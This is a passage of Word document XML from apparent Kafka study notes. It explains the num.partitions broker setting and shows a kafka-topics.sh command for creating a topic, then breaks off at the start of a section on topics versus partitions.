          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This default value is controlled by the broker configuration setting </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>num.partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A52BBE9" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Configuration Parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FFBF53" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>num.partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This parameter determines the default number of partitions that will be used when a new topic is created without a specified partition count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185B994A" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D145FF6" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If the num.partitions is set to 3, any new topic created without a specified number of partitions will have 3 partitions by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B21D0F" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To check or set the default number of partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0911A73D" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Check Current Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can view the default partition setting by checking your Kafka broker's configuration file (server.properties), where you'll find:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05497A06" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDAE7C2" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF9E46D" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>num.partitions=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BD199E" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Set the Default Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can change this value to any desired number of partitions. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788C8B13" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C05F73" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691A88E1" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>num.partitions=3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A02123B" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>After modifying this property, restart the Kafka broker for the changes to take effect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8229E3" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Create a Topic with Specific Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When creating a topic using the kafka-topics command, you can specify the number of partitions as well, overriding the default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288DDC1B" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6541CE59" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289624AB" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kafka-topics.sh --create --topic my-topic --partitions 5 --replication-factor 1 --bootstrap-server &lt;broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23098306" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Why Partitions Matter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF43AEC" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kafka partitions are fundamental to scaling. They allow Kafka to distribute data across multiple brokers, enabling parallel processing and high availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A853CFC" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>More partitions allow for better parallelism and throughput since Kafka consumers can read from different partitions in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248173CE" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Default Partition Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15445AAA" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If your Kafka topic does not specify partitions, it will default to the broker setting, which could potentially lead to lower parallelism in the absence of custom configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A56E167" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D" w:rsidP="0018081D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72122EB7" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Increasing partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an effective way to scale Kafka and improve throughput. However, once a topic is created with a certain number of partitions, it cannot be reduced (though you can add more partitions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E971DE3" w14:textId="77777777" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="0018081D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Always consider the number of partitions based on your application's throughput and scalability requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D19DB5" w14:textId="39B2B48D" w:rsidR="0018081D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0018081D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="4B2731EA">
          <v:rect id="_x0000_i3076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC90A76" w14:textId="3F56D728" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="0077669C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="764" w:name="_Toc196308244"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between topic and partition in Kafka</w:t>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="764"/>
    </w:p>
    <w:p w14:paraId="31B53F71" w14:textId="1853A89E" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="009964FC" w:rsidP="00125737">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</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topics</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are fundamental concepts that help in organizing and managing data. Here's a detailed breakdown of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
